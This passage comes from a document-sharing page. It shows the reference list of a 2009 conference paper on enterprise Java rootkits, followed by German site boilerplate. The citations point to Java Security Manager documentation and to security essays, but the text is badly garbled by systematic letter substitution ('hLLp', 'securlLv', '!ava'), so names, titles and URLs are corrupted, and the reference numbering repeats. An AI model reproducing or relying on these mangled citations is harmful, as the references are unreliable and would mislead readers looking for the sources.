[3] - WebSphere 7.0 roducL uocumenLaLlon, AlLhouah !ava 2 securlLv ls supporLed, lL ls dlsabled bv
defaulL"
hLLp://publlb.boulder.lbm.com/lnfocenLer/waslnfo/v7r0/lndex.[sp?Loplc=/com.lbm.websphere.nd.doc/l
nfo/welcome_nd.hLml
[6] - 1omcaL 6.0 uocumenLaLlon, 1omcaL can be sLarLed wlLh a SecurlLvManaaer ln place bv uslna Lhe "-
securlLv" opLlon"
hLLp://LomcaL.apache.ora/LomcaL-6.0-doc/securlLv-manaaer-howLo.hLml
[7] - Classflsh relude 3 uocumenLaLlon, 1he securlLv manaaer ls dlsabled bv defaulL"
hLLp://docs.sun.com/app/docs/doc/820-4496/abvah?a=vlew
[8] - Webloalc 10 roducL uocumenLaLlon, uslna a !ava SecurlLv Manaaer ls an opLlonal securlLv sLep"
hLLp://e-docs.bea.com/wls/docs100/securlLv/server_proL.hLml
[9] - ArLhur Conan uovle, Sllver 8laze," Lhe curlous lncldenL of Lhe doa ln Lhe nlahL-Llme", 1892
hLLp://en.wlklpedla.ora/wlkl/Sllver_8laze
[10] - ur. Pelnz M. kabuLz, !ava 3 - 'flnal' ls noL flnal anvmore", CcLober 2004
hLLp://www.[avaspeclallsLs.co.za/archlve/lssue096.hLml
[11] - Allan Polub, Modlfvlna archlves, arL 2: 1he Archlve Class," CcLober 2000
hLLp://www.[avaworld.com/[avaworld/[w-10-2000/[w-1027-Loolbox.hLml
[12] - lowler, lnverslon of ConLrol ConLalners and Lhe uependencv ln[ecLlon aLLern," !anuarv 2004
hLLp://www.marLlnfowler.com/arLlcles/ln[ecLlon.hLml
[13] - ken 1hompson, 8eflecLlons on 1rusLlna 1rusL," AuausL 1984
hLLp://cm.bell-labs.com/who/ken/LrusL.hLml
[14] - uavld Mavnor, 1he Compller as ALLack vecLor," !anuarv 2003
hLLp://www.llnux[ournal.com/arLlcle/7839
[13] - Chess, Lee, and WesL, ALLacklna Lhe 8ulld Lhrouah Cross-8ulld ln[ecLlon," SepLember 2007
hLLp://www.forLlfv.com/servleL/download/publlc/forLlfv_aLLacklna_Lhe_bulld.pdf
[16] - 8ruce Schneler, lnslders", lebruarv 2009
hLLp://www.schneler.com/bloa/archlves/2009/02/lnslders.hLml
[17] - Cooale AppLnalne uocumenLaLlon, 1he !8L Class WhlLellsL"
hLLp://code.aooale.com/appenalne/docs/[ava/[rewhlLellsL.hLml

BHUSA09 Williams Enterprise Java Root Kits PAPER

Hochgeladen von

Dokumentinformationen

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

BHUSA09 Williams Enterprise Java Root Kits PAPER

Hochgeladen von

Copyright:

Verfügbare Formate

LnLerprlse !

Das könnte Ihnen auch gefallen